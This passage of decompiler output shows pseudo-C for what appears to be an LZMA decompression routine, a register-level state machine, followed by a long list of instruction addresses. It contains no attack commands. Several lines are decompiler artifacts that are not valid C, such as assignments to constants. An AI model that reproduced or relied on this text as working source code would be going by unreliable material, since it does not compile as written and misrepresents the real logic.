                          													 *(__ebp - 0x40) = 8;
                          													L144:
                          													 *(__ebp - 0x7c) = 0x14;
                          													goto L145;
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												 *(__ebp - 0x30) = 8;
                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          												L130:
                          												 *(__ebp - 0x58) = __eax;
                          												 *(__ebp - 0x40) = 3;
                          												goto L144;
                          											case 0x14:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          												__eax =  *(__ebp - 0x80);
                          												 *(_t613 - 0x88) = _t533;
                          												goto L1;
                          											case 0x15:
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xb;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          												goto L120;
                          											case 0x16:
                          												__eax =  *(__ebp - 0x30);
                          												__eflags = __eax - 4;
                          												if(__eax >= 4) {
                          													_push(3);
                          													_pop(__eax);
                          												}
                          												__ecx =  *(__ebp - 4);
                          												 *(__ebp - 0x40) = 6;
                          												__eax = __eax << 7;
                          												 *(__ebp - 0x7c) = 0x19;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L145;
                          											case 0x17:
                          												L145:
                          												__eax =  *(__ebp - 0x40);
                          												 *(__ebp - 0x50) = 1;
                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          												goto L149;
                          											case 0x18:
                          												L146:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x18;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t484 = __ebp - 0x70;
                          												 *_t484 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t484;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L148:
                          												_t487 = __ebp - 0x48;
                          												 *_t487 =  *(__ebp - 0x48) - 1;
                          												__eflags =  *_t487;
                          												L149:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__ecx =  *(__ebp - 0x40);
                          													__ebx =  *(__ebp - 0x50);
                          													0 = 1;
                          													__eax = 1 << __cl;
                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          													__eax =  *(__ebp - 0x7c);
                          													 *(__ebp - 0x44) = __ebx;
                          													while(1) {
                          														 *(_t613 - 0x88) = _t533;
                          														goto L1;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x50);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          												__eax =  *(__ebp - 0x58);
                          												__esi = __edx + __eax;
                          												 *(__ebp - 0x54) = __esi;
                          												__ax =  *__esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													__cx = __ax >> 5;
                          													__eax = __eax - __ecx;
                          													__edx = __edx + 1;
                          													__eflags = __edx;
                          													 *__esi = __ax;
                          													 *(__ebp - 0x50) = __edx;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L148;
                          												} else {
                          													goto L146;
                          												}
                          											case 0x19:
                          												__eflags = __ebx - 4;
                          												if(__ebx < 4) {
                          													 *(__ebp - 0x2c) = __ebx;
                          													L119:
                          													_t393 = __ebp - 0x2c;
                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                          													__eflags =  *_t393;
                          													L120:
                          													__eax =  *(__ebp - 0x2c);
                          													__eflags = __eax;
                          													if(__eax == 0) {
                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          														goto L170;
                          													}
                          													__eflags = __eax -  *(__ebp - 0x60);
                          													if(__eax >  *(__ebp - 0x60)) {
                          														goto L171;
                          													}
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          													__eax =  *(__ebp - 0x30);
                          													_t400 = __ebp - 0x60;
                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          													__eflags =  *_t400;
                          													goto L123;
                          												}
                          												__ecx = __ebx;
                          												__eax = __ebx;
                          												__ecx = __ebx >> 1;
                          												__eax = __ebx & 0x00000001;
                          												__ecx = (__ebx >> 1) - 1;
                          												__al = __al | 0x00000002;
                          												__eax = (__ebx & 0x00000001) << __cl;
                          												__eflags = __ebx - 0xe;
                          												 *(__ebp - 0x2c) = __eax;
                          												if(__ebx >= 0xe) {
                          													__ebx = 0;
                          													 *(__ebp - 0x48) = __ecx;
                          													L102:
                          													__eflags =  *(__ebp - 0x48);
                          													if( *(__ebp - 0x48) <= 0) {
                          														__eax = __eax + __ebx;
                          														 *(__ebp - 0x40) = 4;
                          														 *(__ebp - 0x2c) = __eax;
                          														__eax =  *(__ebp - 4);
                          														__eax =  *(__ebp - 4) + 0x644;
                          														__eflags = __eax;
                          														L108:
                          														__ebx = 0;
                          														 *(__ebp - 0x58) = __eax;
                          														 *(__ebp - 0x50) = 1;
                          														 *(__ebp - 0x44) = 0;
                          														 *(__ebp - 0x48) = 0;
                          														L112:
                          														__eax =  *(__ebp - 0x40);
                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          															_t391 = __ebp - 0x2c;
                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          															__eflags =  *_t391;
                          															goto L119;
                          														}
                          														__eax =  *(__ebp - 0x50);
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          														__eax =  *(__ebp - 0x58);
                          														__esi = __edi + __eax;
                          														 *(__ebp - 0x54) = __esi;
                          														__ax =  *__esi;
                          														__ecx = __ax & 0x0000ffff;
                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          														__eflags =  *(__ebp - 0xc) - __edx;
                          														if( *(__ebp - 0xc) >= __edx) {
                          															__ecx = 0;
                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          															__ecx = 1;
                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          															__ebx = 1;
                          															__ecx =  *(__ebp - 0x48);
                          															__ebx = 1 << __cl;
                          															__ecx = 1 << __cl;
                          															__ebx =  *(__ebp - 0x44);
                          															__ebx =  *(__ebp - 0x44) | __ecx;
                          															__cx = __ax;
                          															__cx = __ax >> 5;
                          															__eax = __eax - __ecx;
                          															__edi = __edi + 1;
                          															__eflags = __edi;
                          															 *(__ebp - 0x44) = __ebx;
                          															 *__esi = __ax;
                          															 *(__ebp - 0x50) = __edi;
                          														} else {
                          															 *(__ebp - 0x10) = __edx;
                          															0x800 = 0x800 - __ecx;
                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          															 *__esi = __dx;
                          														}
                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                          														if( *(__ebp - 0x10) >= 0x1000000) {
                          															L111:
                          															_t368 = __ebp - 0x48;
                          															 *_t368 =  *(__ebp - 0x48) + 1;
                          															__eflags =  *_t368;
                          															goto L112;
                          														} else {
                          															goto L109;
                          														}
                          													}
                          													__ecx =  *(__ebp - 0xc);
                          													__ebx = __ebx + __ebx;
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          														__ecx =  *(__ebp - 0x10);
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          														__ebx = __ebx | 0x00000001;
                          														__eflags = __ebx;
                          														 *(__ebp - 0x44) = __ebx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L101:
                          														_t338 = __ebp - 0x48;
                          														 *_t338 =  *(__ebp - 0x48) - 1;
                          														__eflags =  *_t338;
                          														goto L102;
                          													} else {
                          														goto L99;
                          													}
                          												}
                          												__edx =  *(__ebp - 4);
                          												__eax = __eax - __ebx;
                          												 *(__ebp - 0x40) = __ecx;
                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          												goto L108;
                          											case 0x1a:
                          												L56:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1a;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x68);
                          												__al =  *(__ebp - 0x5c);
                          												__edx =  *(__ebp - 8);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *( *(__ebp - 0x68)) = __al;
                          												__ecx =  *(__ebp - 0x14);
                          												 *(__ecx +  *(__ebp - 8)) = __al;
                          												__eax = __ecx + 1;
                          												__edx = 0;
                          												_t192 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t192;
                          												goto L80;
                          											case 0x1b:
                          												L76:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1b;
                          													goto L170;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t275 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t275;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												_t284 = __ebp - 0x64;
                          												 *_t284 =  *(__ebp - 0x64) - 1;
                          												__eflags =  *_t284;
                          												 *( *(__ebp - 0x68)) = __cl;
                          												L80:
                          												 *(__ebp - 0x14) = __edx;
                          												goto L81;
                          											case 0x1c:
                          												while(1) {
                          													L123:
                          													__eflags =  *(__ebp - 0x64);
                          													if( *(__ebp - 0x64) == 0) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__edx =  *(__ebp - 8);
                          													__cl =  *(__eax + __edx);
                          													__eax =  *(__ebp - 0x14);
                          													 *(__ebp - 0x5c) = __cl;
                          													 *(__eax + __edx) = __cl;
                          													__eax = __eax + 1;
                          													__edx = 0;
                          													_t414 = __eax %  *(__ebp - 0x74);
                          													__eax = __eax /  *(__ebp - 0x74);
                          													__edx = _t414;
                          													__eax =  *(__ebp - 0x68);
                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          													__eflags =  *(__ebp - 0x30);
                          													 *( *(__ebp - 0x68)) = __cl;
                          													 *(__ebp - 0x14) = _t414;
                          													if( *(__ebp - 0x30) > 0) {
                          														continue;
                          													} else {
                          														L81:
                          														 *(__ebp - 0x88) = 2;
                          														goto L1;
                          													}
                          												}
                          												 *(__ebp - 0x88) = 0x1c;
                          												goto L170;
                          										}
                          									}
                          									L171:
                          									_t535 = _t534 | 0xffffffff;
                          									goto L172;
                          								}
                          							}
                          						}
                          					}
                          					goto L1;
                          				}
                          			}













                          0x00000000
                          0x00406fbb
                          0x00406fbb
                          0x00406fbf
                          0x00406fcc
                          0x00406fd6
                          0x00000000
                          0x00406fc1
                          0x00406fc1
                          0x00406ffc
                          0x00406fff
                          0x00407002
                          0x00407005
                          0x00407005
                          0x00407008
                          0x0040700f
                          0x00407014
                          0x00406ef5
                          0x00406ef8
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x0040726d
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x004072bb
                          0x004072bf
                          0x0040746e
                          0x00407484
                          0x0040748c
                          0x00407493
                          0x00407495
                          0x0040749c
                          0x004074a0
                          0x004074a0
                          0x004072cb
                          0x004072d2
                          0x004072da
                          0x004072dd
                          0x004072e0
                          0x004072e0
                          0x004072e6
                          0x004072e6
                          0x00406a82
                          0x00406a82
                          0x00406a82
                          0x00406a8b
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00000000
                          0x00406a9c
                          0x00000000
                          0x00000000
                          0x00406aa5
                          0x00406aa8
                          0x00406aab
                          0x00406aaf
                          0x00000000
                          0x00000000
                          0x00406ab5
                          0x00406ab8
                          0x00406aba
                          0x00406abb
                          0x00406abe
                          0x00406ac0
                          0x00406ac1
                          0x00406ac3
                          0x00406ac6
                          0x00406acb
                          0x00406ad0
                          0x00406ad9
                          0x00406aec
                          0x00406aef
                          0x00406afb
                          0x00406b23
                          0x00406b25
                          0x00406b33
                          0x00406b33
                          0x00406b37
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406b27
                          0x00406b27
                          0x00406b2a
                          0x00406b2b
                          0x00406b2b
                          0x00000000
                          0x00406b27
                          0x00406b01
                          0x00406b06
                          0x00406b06
                          0x00406b0f
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00406b20
                          0x00406b20
                          0x00000000
                          0x00406b20
                          0x00000000
                          0x00406b3d
                          0x00406b3d
                          0x00406b41
                          0x004073ed
                          0x00000000
                          0x004073ed
                          0x00406b4a
                          0x00406b5a
                          0x00406b5d
                          0x00406b60
                          0x00406b60
                          0x00406b60
                          0x00406b63
                          0x00406b67
                          0x00000000
                          0x00000000
                          0x00406b69
                          0x00406b6f
                          0x00406b99
                          0x00406b9f
                          0x00406ba6
                          0x00000000
                          0x00406ba6
                          0x00406b75
                          0x00406b78
                          0x00406b7d
                          0x00406b7d
                          0x00406b88
                          0x00406b90
                          0x00406b93
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bd8
                          0x00406bde
                          0x00406be1
                          0x00406bee
                          0x00406bf6
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x00000000
                          0x00406bad
                          0x00406bad
                          0x00406bb1
                          0x004073fc
                          0x00000000
                          0x004073fc
                          0x00406bbd
                          0x00406bc8
                          0x00406bc8
                          0x00406bc8
                          0x00406bcb
                          0x00406bce
                          0x00406bd1
                          0x00406bd6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bfe
                          0x00406c00
                          0x00406c03
                          0x00406c74
                          0x00406c77
                          0x00406c7a
                          0x00406c81
                          0x00406c8b
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040726a
                          0x00406c05
                          0x00406c09
                          0x00406c0c
                          0x00406c0e
                          0x00406c11
                          0x00406c14
                          0x00406c16
                          0x00406c19
                          0x00406c1b
                          0x00406c20
                          0x00406c23
                          0x00406c26
                          0x00406c2a
                          0x00406c31
                          0x00406c34
                          0x00406c3b
                          0x00406c3f
                          0x00406c47
                          0x00406c47
                          0x00406c47
                          0x00406c41
                          0x00406c41
                          0x00406c41
                          0x00406c36
                          0x00406c36
                          0x00406c36
                          0x00406c4b
                          0x00406c4e
                          0x00406c6c
                          0x00406c6e
                          0x00000000
                          0x00406c50
                          0x00406c50
                          0x00406c53
                          0x00406c56
                          0x00406c59
                          0x00406c5b
                          0x00406c5b
                          0x00406c5b
                          0x00406c5e
                          0x00406c61
                          0x00406c63
                          0x00406c64
                          0x00406c67
                          0x00000000
                          0x00406c67
                          0x00000000
                          0x00406e9d
                          0x00406ea1
                          0x00406ebf
                          0x00406ec2
                          0x00406ec9
                          0x00406ecc
                          0x00406ecf
                          0x00406ed2
                          0x00406ed5
                          0x00406ed8
                          0x00406eda
                          0x00406ee1
                          0x00406ee2
                          0x00406ee4
                          0x00406ee7
                          0x00406eea
                          0x00406eed
                          0x00406eed
                          0x00406ef2
                          0x00000000
                          0x00406ef2
                          0x00406ea3
                          0x00406ea6
                          0x00406ea9
                          0x00406eb3
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x00000000
                          0x00406f07
                          0x00406f0b
                          0x00406f2e
                          0x00406f31
                          0x00406f34
                          0x00406f3e
                          0x00406f0d
                          0x00406f0d
                          0x00406f10
                          0x00406f13
                          0x00406f16
                          0x00406f23
                          0x00406f26
                          0x00406f26
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x00000000
                          0x00406f4a
                          0x00406f4e
                          0x00000000
                          0x00000000
                          0x00406f54
                          0x00406f58
                          0x00000000
                          0x00000000
                          0x00406f5e
                          0x00406f60
                          0x00406f64
                          0x00406f64
                          0x00406f67
                          0x00406f6b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406fe2
                          0x00406fe6
                          0x00406fed
                          0x00406ff0
                          0x00406ff3
                          0x00406fe8
                          0x00406fe8
                          0x00406fe8
                          0x00406ff6
                          0x00406ff9
                          0x00000000
                          0x00000000
                          0x004070a2
                          0x004070a2
                          0x004070a6
                          0x00407444
                          0x00000000
                          0x00407444
                          0x004070ac
                          0x004070af
                          0x004070b2
                          0x004070b6
                          0x004070b9
                          0x004070bf
                          0x004070c1
                          0x004070c1
                          0x004070c1
                          0x004070c4
                          0x004070c7
                          0x00000000
                          0x00000000
                          0x00406c97
                          0x00406c97
                          0x00406c9b
                          0x00407408
                          0x00000000
                          0x00407408
                          0x00406ca1
                          0x00406ca4
                          0x00406ca7
                          0x00406cab
                          0x00406cae
                          0x00406cb4
                          0x00406cb6
                          0x00406cb6
                          0x00406cb6
                          0x00406cb9
                          0x00406cbc
                          0x00406cbc
                          0x00406cbf
                          0x00406cc2
                          0x00000000
                          0x00000000
                          0x00406cc8
                          0x00406cce
                          0x00000000
                          0x00000000
                          0x00406cd4
                          0x00406cd4
                          0x00406cd8
                          0x00406cdb
                          0x00406cde
                          0x00406ce1
                          0x00406ce4
                          0x00406ce5
                          0x00406ce8
                          0x00406cea
                          0x00406cf0
                          0x00406cf3
                          0x00406cf6
                          0x00406cf9
                          0x00406cfc
                          0x00406cff
                          0x00406d02
                          0x00406d1e
                          0x00406d21
                          0x00406d24
                          0x00406d27
                          0x00406d2e
                          0x00406d32
                          0x00406d34
                          0x00406d38
                          0x00406d04
                          0x00406d04
                          0x00406d08
                          0x00406d10
                          0x00406d15
                          0x00406d17
                          0x00406d19
                          0x00406d19
                          0x00406d3b
                          0x00406d42
                          0x00406d45
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d50
                          0x00406d50
                          0x00406d54
                          0x00407414
                          0x00000000
                          0x00407414
                          0x00406d5a
                          0x00406d5d
                          0x00406d60
                          0x00406d64
                          0x00406d67
                          0x00406d6d
                          0x00406d6f
                          0x00406d6f
                          0x00406d6f
                          0x00406d72
                          0x00406d75
                          0x00406d75
                          0x00406d75
                          0x00406d7b
                          0x00000000
                          0x00000000
                          0x00406d7d
                          0x00406d80
                          0x00406d83
                          0x00406d86
                          0x00406d89
                          0x00406d8c
                          0x00406d8f
                          0x00406d92
                          0x00406d95
                          0x00406d98
                          0x00406d9b
                          0x00406db3
                          0x00406db6
                          0x00406db9
                          0x00406dbc
                          0x00406dbc
                          0x00406dbf
                          0x00406dc3
                          0x00406dc5
                          0x00406d9d
                          0x00406d9d
                          0x00406da5
                          0x00406daa
                          0x00406dac
                          0x00406dae
                          0x00406dae
                          0x00406dc8
                          0x00406dcf
                          0x00406dd2
                          0x00000000
                          0x00406dd4
                          0x00000000
                          0x00406dd4
                          0x00406dd2
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00000000
                          0x00000000
                          0x00406e14
                          0x00406e14
                          0x00406e18
                          0x00407420
                          0x00000000
                          0x00407420
                          0x00406e1e
                          0x00406e21
                          0x00406e24
                          0x00406e28
                          0x00406e2b
                          0x00406e31
                          0x00406e33
                          0x00406e33
                          0x00406e33
                          0x00406e36
                          0x00406e39
                          0x00406e39
                          0x00406e3f
                          0x00406ddd
                          0x00406ddd
                          0x00406de0
                          0x00000000
                          0x00406de0
                          0x00406e41
                          0x00406e41
                          0x00406e44
                          0x00406e47
                          0x00406e4a
                          0x00406e4d
                          0x00406e50
                          0x00406e53
                          0x00406e56
                          0x00406e59
                          0x00406e5c
                          0x00406e5f
                          0x00406e77
                          0x00406e7a
                          0x00406e7d
                          0x00406e80
                          0x00406e80
                          0x00406e83
                          0x00406e87
                          0x00406e89
                          0x00406e61
                          0x00406e61
                          0x00406e69
                          0x00406e6e
                          0x00406e70
                          0x00406e72
                          0x00406e72
                          0x00406e8c
                          0x00406e93
                          0x00406e96
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00407125
                          0x00407125
                          0x00407129
                          0x00407450
                          0x00000000
                          0x00407450
                          0x0040712f
                          0x00407132
                          0x00407135
                          0x00407139
                          0x0040713c
                          0x00407142
                          0x00407144
                          0x00407144
                          0x00407144
                          0x00407147
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00407234
                          0x00407238
                          0x0040725a
                          0x0040725d
                          0x00407267
                          0x0040726a
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040726a
                          0x0040723a
                          0x0040723d
                          0x00407241
                          0x00407244
                          0x00407244
                          0x00407247
                          0x00000000
                          0x00000000
                          0x004072f1
                          0x004072f5
                          0x00407313
                          0x00407313
                          0x00407313
                          0x0040731a
                          0x00407321
                          0x00407328
                          0x00407328
                          0x00000000
                          0x00407328
                          0x004072f7
                          0x004072fa
                          0x004072fd
                          0x00407300
                          0x00407307
                          0x0040724b
                          0x0040724b
                          0x0040724e
                          0x00000000
                          0x00000000
                          0x004073e2
                          0x004073e5
                          0x004072e6
                          0x00000000
                          0x00000000
                          0x0040701c
                          0x0040701e
                          0x00407025
                          0x00407026
                          0x00407028
                          0x0040702b
                          0x00000000
                          0x00000000
                          0x00407033
                          0x00407036
                          0x00407039
                          0x0040703b
                          0x0040703d
                          0x0040703d
                          0x0040703e
                          0x00407041
                          0x00407048
                          0x0040704b
                          0x00407059
                          0x00000000
                          0x00000000
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00000000
                          0x00000000
                          0x0040733e
                          0x0040733e
                          0x00407342
                          0x0040747a
                          0x00000000
                          0x0040747a
                          0x00407348
                          0x0040734b
                          0x0040734e
                          0x00407352
                          0x00407355
                          0x0040735b
                          0x0040735d
                          0x0040735d
                          0x0040735d
                          0x00407360
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407366
                          0x00407366
                          0x0040736a
                          0x004073ca
                          0x004073cd
                          0x004073d2
                          0x004073d3
                          0x004073d5
                          0x004073d7
                          0x004073da
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x004072ec
                          0x004072e6
                          0x0040736c
                          0x00407372
                          0x00407375
                          0x00407378
                          0x0040737b
                          0x0040737e
                          0x00407381
                          0x00407384
                          0x00407387
                          0x0040738a
                          0x0040738d
                          0x004073a6
                          0x004073a9
                          0x004073ac
                          0x004073af
                          0x004073b3
                          0x004073b5
                          0x004073b5
                          0x004073b6
                          0x004073b9
                          0x0040738f
                          0x0040738f
                          0x00407397
                          0x0040739c
                          0x0040739e
                          0x004073a1
                          0x004073a1
                          0x004073bc
                          0x004073c3
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x00407061
                          0x00407064
                          0x0040709a
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071cd
                          0x004071cd
                          0x004071d0
                          0x004071d2
                          0x0040745c
                          0x00000000
                          0x0040745c
                          0x004071d8
                          0x004071db
                          0x00000000
                          0x00000000
                          0x004071e1
                          0x004071e5
                          0x004071e8
                          0x004071e8
                          0x004071e8
                          0x00000000
                          0x004071e8
                          0x00407066
                          0x00407068
                          0x0040706a
                          0x0040706c
                          0x0040706f
                          0x00407070
                          0x00407072
                          0x00407074
                          0x00407077
                          0x0040707a
                          0x00407090
                          0x00407095
                          0x004070cd
                          0x004070cd
                          0x004070d1
                          0x004070fd
                          0x004070ff
                          0x00407106
                          0x00407109
                          0x0040710c
                          0x0040710c
                          0x00407111
                          0x00407111
                          0x00407113
                          0x00407116
                          0x0040711d
                          0x00407120
                          0x0040714d
                          0x0040714d
                          0x00407150
                          0x00407153
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x00000000
                          0x004071c7
                          0x00407155
                          0x0040715b
                          0x0040715e
                          0x00407161
                          0x00407164
                          0x00407167
                          0x0040716a
                          0x0040716d
                          0x00407170
                          0x00407173
                          0x00407176
                          0x0040718f
                          0x00407191
                          0x00407194
                          0x00407195
                          0x00407198
                          0x0040719a
                          0x0040719d
                          0x0040719f
                          0x004071a1
                          0x004071a4
                          0x004071a6
                          0x004071a9
                          0x004071ad
                          0x004071af
                          0x004071af
                          0x004071b0
                          0x004071b3
                          0x004071b6
                          0x00407178
                          0x00407178
                          0x00407180
                          0x00407185
                          0x00407187
                          0x0040718a
                          0x0040718a
                          0x004071b9
                          0x004071c0
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x00000000
                          0x004071c2
                          0x00000000
                          0x004071c2
                          0x004071c0
                          0x004070d3
                          0x004070d6
                          0x004070d8
                          0x004070db
                          0x004070de
                          0x004070e1
                          0x004070e3
                          0x004070e6
                          0x004070e9
                          0x004070e9
                          0x004070ec
                          0x004070ec
                          0x004070ef
                          0x004070f6
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x00000000
                          0x004070f8
                          0x00000000
                          0x004070f8
                          0x004070f6
                          0x0040707c
                          0x0040707f
                          0x00407081
                          0x00407084
                          0x00000000
                          0x00000000
                          0x00406de3
                          0x00406de3
                          0x00406de7
                          0x0040742c
                          0x00000000
                          0x0040742c
                          0x00406ded
                          0x00406df0
                          0x00406df3
                          0x00406df6
                          0x00406df9
                          0x00406dfc
                          0x00406dff
                          0x00406e01
                          0x00406e04
                          0x00406e07
                          0x00406e0a
                          0x00406e0c
                          0x00406e0c
                          0x00406e0c
                          0x00000000
                          0x00000000
                          0x00406f6e
                          0x00406f6e
                          0x00406f72
                          0x00407438
                          0x00000000
                          0x00407438
                          0x00406f78
                          0x00406f7b
                          0x00406f7e
                          0x00406f81
                          0x00406f83
                          0x00406f83
                          0x00406f83
                          0x00406f86
                          0x00406f89
                          0x00406f8c
                          0x00406f8f
                          0x00406f92
                          0x00406f95
                          0x00406f96
                          0x00406f98
                          0x00406f98
                          0x00406f98
                          0x00406f9b
                          0x00406f9e
                          0x00406fa1
                          0x00406fa4
                          0x00406fa4
                          0x00406fa4
                          0x00406fa7
                          0x00406fa9
                          0x00406fa9
                          0x00000000
                          0x00000000
                          0x004071eb
                          0x004071eb
                          0x004071eb
                          0x004071ef
                          0x00000000
                          0x00000000
                          0x004071f5
                          0x004071f8
                          0x004071fb
